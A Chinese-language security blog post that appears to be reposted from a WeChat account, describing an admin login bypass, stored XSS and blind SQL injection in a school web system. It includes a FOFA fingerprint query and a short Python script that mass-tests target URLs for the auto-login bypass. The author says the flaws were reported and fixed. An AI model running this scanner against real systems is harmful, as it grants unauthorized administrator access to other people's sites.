一、漏洞挖掘
1、邏輯缺陷
熟悉的頁面,熟悉的弱口令測試,但無果

我就把目光轉向js審計,果不其然有新發現,可以根據賬號自動登錄

于是直接構造請求繞過登錄

經典的管理員權限
2、存儲型XSS
尋找文本輸入

淺析:前端:這里的標簽都是普通標簽,沒有像RCDATA元素(RCDATA elements),有

所以就簡單了,直接插入即可

3、SQL注入

測試無果

最后發現注入點在第一個函數,果然任何一個輸入點都可能是不安全的,是布爾型盲注

后面就是經典Sqlmap了

二、繼續通殺
根據系統指紋在fofa上搜索:"xx系統" && icon_hash="11xxxx"有32個IP,看了下,有重復的

使用fofa_viewer導出目標 這里我根據第一個邏輯漏洞的漏洞指紋信息,寫了一個簡單poc
import requests
def poc(url):
poc_url = url + '/login/doautologin.edu'
data = {'um.userid': "admin"}
try:
res = requests.post(poc_url, data=data, timeout=5)
if (res.headers.get("Set-Cookie")): # 登錄成功就會set-cookie
print(url + '/login.html')
except BaseException:
pass
if __name__ == '__main__':
with open('url.txt', 'r') as f:
for i in f:
poc(i.rstrip('
'))
以上漏洞均已報告給相應學校且已修復
三、思考總結
1)在訪問系統當中的時候F12查看源碼是一個不錯的習慣(尤其是有前端彈框的)
2)前端代碼的一切展示行為完全可控(一定要理解這句話)
3)了解程序的底層邏輯,你才能更清晰的知道每一個參數的意義
本文作者:B0ther
審核編輯:黃飛
-
SQL
+關注
關注
1文章
789瀏覽量
46700 -
安全漏洞
+關注
關注
0文章
152瀏覽量
17157 -
edu
+關注
關注
0文章
24瀏覽量
2004
原文標題:記一次EDU網站漏洞通殺
文章出處:【微信號:菜鳥學安全,微信公眾號:菜鳥學安全】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
實戰記錄:EDU網站漏洞通殺全過程
評論